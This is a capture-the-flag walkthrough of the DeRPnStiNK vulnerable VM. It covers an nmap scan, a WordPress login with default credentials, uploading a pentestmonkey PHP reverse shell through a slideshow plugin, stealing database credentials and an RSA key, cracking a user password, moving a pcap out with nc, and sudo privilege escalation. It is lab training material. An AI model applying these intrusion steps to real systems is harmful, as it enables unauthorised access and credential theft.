Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT
Nmap scan report for 192.168.1.116
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:7D:91:B5 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
Let's put the IP to the web browser
If we go to inspect element and open up all div we can get the first flag
Dirb
We can see at the nmap and dirb scan has robots.txt, lets navigate to there
As we can see, we don't have permission on /php and /temporary told us to try harder.
We also can see a /weblog in the dirb scan. After navigating to there I got an error
I navigate to /etc/hosts and add a IP at there
After that refresh the page and we can see a WordPress Blog
Wpscan
We got 2 plugins and 2 usernames, for the first try, I managed to log in using the username admin and password admin
After clicking around, I found out that under manage slides we can edit the slideshow and bottom we can see that we can upload image. So, I decided to upload a shell file.
Exploitation
Reverse Shell
Go to this page and download the php reverse shell file from pentestmonkey
Change the IP and the port to our machine then we need to set up a listener
Then we can go to Manage Slides
And I click randonx to edit
Scroll to the bottom we can see this
Upload the reverse shell file.
Then go back to the /weblog
Click the right arrow on the slides until you get a reverse shell!
And then we can type
When I run linpeas.sh, I found mysql username and password.
Then we can go /php/myphpadmin to log into the MySQL database
Then go to wordpress database and go to wp_users
I found out that the hash is too difficult to crack because of hash, make it easy, I copy the admin hash to replace the unclestinky hash
Then we can login into the wordpress again
Go to the post, and we will find the second flag.
We then go back to the database and go to mysql database and go to user table.
Then we can take unclestinky password to crack it at here
We got the password wedgie57
We then can ssh to the user stinky
Then I went to the Desktop folder and I found the third flag!
After that, I went to the /home directory, I found out 1 ftp folder
Then, there is a bunch of ssh files inside over each other
After 7 times of changing directory, we got key.txt
It contains RSA private key
This might a clue on ssh to the user stinky
We save the RSA txt to a file called id_rsa and put it at /root/.ssh
We can see that the id_rsa is too open so we need to change the permission
type chmod 700 id_rsa
Then we can ssh into it
Then navigate to /home/Stinky/Documents we can get a pcap file
Transfer it using nc to our machine
Then analyse the file using wireshark
Then we can follow the TCP stream and this is the password for user mrderp.
we then su to user mrderp
Then type sudo -l
Privilege Escalation
We can see that inside the /home/mrderp we don't have the folder called binaries.
So we need to create one
Got root !
Navigate to the /root/Desktop to get the fourth flag
